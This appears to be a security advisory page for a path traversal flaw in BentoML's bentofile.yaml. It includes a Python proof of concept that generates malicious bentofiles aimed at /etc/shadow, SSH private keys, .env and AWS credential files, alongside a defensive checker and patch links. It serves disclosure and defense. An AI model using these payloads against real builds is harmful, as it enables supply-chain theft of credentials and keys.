Security Vulnerability Report
CVE-2026-24123 CVSS 7.4 HIGH

CVE-2026-24123

Published: 2026-01-26 23:16:08
Last Modified: 2026-02-03 15:07:56

Description

BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Prior to version 1.4.34, BentoML's `bentofile.yaml` configuration allows path traversal attacks through multiple file path fields (`description`, `docker.setup_script`, `docker.dockerfile_template`, `conda.environment_yml`). An attacker can craft a malicious bentofile that, when built by a victim, exfiltrates arbitrary files from the filesystem into the bento archive. This enables supply chain attacks where sensitive files (SSH keys, credentials, environment variables) are silently embedded in bentos and exposed when pushed to registries or deployed. Version 1.4.34 contains a patch for the issue.

CVSS Details

CVSS Score: 7.4
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:bentoml:bentoml:*:*:*:*:*:*:*:* - VULNERABLE
BentoML < 1.4.34

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
CVE-2026-24123 PoC - Malicious bentofile.yaml for BentoML Path Traversal
This PoC demonstrates how an attacker can exfiltrate sensitive files via bentofile.yaml
"""

malicious_bentofile = """
service: "test:predict"
description: |
  ../../../etc/passwd
  ../../../root/.ssh/id_rsa
  ../../../home/*/.env
docker:
  setup_script: ../../../etc/shadow
  dockerfile_template: ../../../root/.bashrc
conda:
  environment_yml: ../../../etc/environment
labels:
  author: attacker
  purpose: sensitive_data_exfiltration
"""


# Alternative PoC using Python API
def generate_malicious_bentofile(target_paths):
    """
    Generate malicious bentofile.yaml to exfiltrate files

    Args:
        target_paths: List of file paths to exfiltrate
    """
    paths_section = '\n'.join([f' ../../../{path}' for path in target_paths])
    malicious_yaml = f"""
service: "exfil:Predict"
description: |
{paths_section}
docker:
  setup_script: ../../../etc/shadow
labels:
  malicious: "true"
"""
    return malicious_yaml


# Example usage
if __name__ == "__main__":
    targets = [
        'etc/passwd',
        'root/.ssh/id_rsa',
        'home/user/.env',
        '.aws/credentials',
        '.git/config'
    ]
    poc = generate_malicious_bentofile(targets)
    print("Generated malicious bentofile.yaml:")
    print(poc)
    print("\nNote: When victim builds this bentofile with 'bentoml build', ")
    print("the sensitive files will be embedded in the bento archive.")
```
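
A pre-build check for the fields named in the description, as an added example (not BentoML's patch and not code from the original page): it flags any path value that resolves outside the build context. The function names, `SAMPLE_CONFIG`, and the handling of a `file:` prefix are assumptions made for illustration; the config is taken as an already-parsed mapping.

```python
import os

# Path-valued bentofile.yaml fields listed in the CVE-2026-24123 description.
PATH_FIELDS = (
    ("description",),
    ("docker", "setup_script"),
    ("docker", "dockerfile_template"),
    ("conda", "environment_yml"),
)

# Constructed sample: the mapping a YAML loader would return for a bentofile.
SAMPLE_CONFIG = {
    "service": "service:Predict",
    "description": "file: ./README.md",
    "docker": {"setup_script": "../../../etc/shadow",
               "dockerfile_template": "./Dockerfile.j2"},
    "conda": {"environment_yml": "/etc/environment"},
}

def escapes_context(value, build_ctx):
    """True if value, resolved against build_ctx, lands outside build_ctx."""
    root = os.path.realpath(build_ctx)
    # realpath collapses ".." and follows symlinks; an absolute value
    # replaces root entirely in os.path.join, so it is caught as well.
    target = os.path.realpath(os.path.join(root, value))
    return os.path.commonpath([root, target]) != root

def audit_bentofile(config, build_ctx):
    """Return (field, value) pairs whose path leaves the build context."""
    findings = []
    for keys in PATH_FIELDS:
        node = config
        for key in keys:
            node = node.get(key) if isinstance(node, dict) else None
        if not isinstance(node, str):
            continue
        for line in node.splitlines():
            # Assumption: "file:" marks a description loaded from a file.
            candidate = line.strip().removeprefix("file:").strip()
            if candidate and escapes_context(candidate, build_ctx):
                findings.append((".".join(keys), candidate))
    return findings

if __name__ == "__main__":
    for field, value in audit_bentofile(SAMPLE_CONFIG, os.getcwd()):
        print(f"REJECT {field}: {value!r} resolves outside the build context")
```

Running a check like this in CI on bentofiles from untrusted sources complements upgrading to 1.4.34; it does not replace the upgrade.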

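References

https://github.com/bentoml/BentoML/commit/84d08cfeb40c5f2ce71b3d3444bbaa0fb16b5ca4 (Patch)
https://github.com/bentoml/BentoML/releases/tag/v1.4.34 (Product, Release Notes)
https://github.com/bentoml/BentoML/security/advisories/GHSA-6r62-w2q3-48hf (Vendor Advisory)
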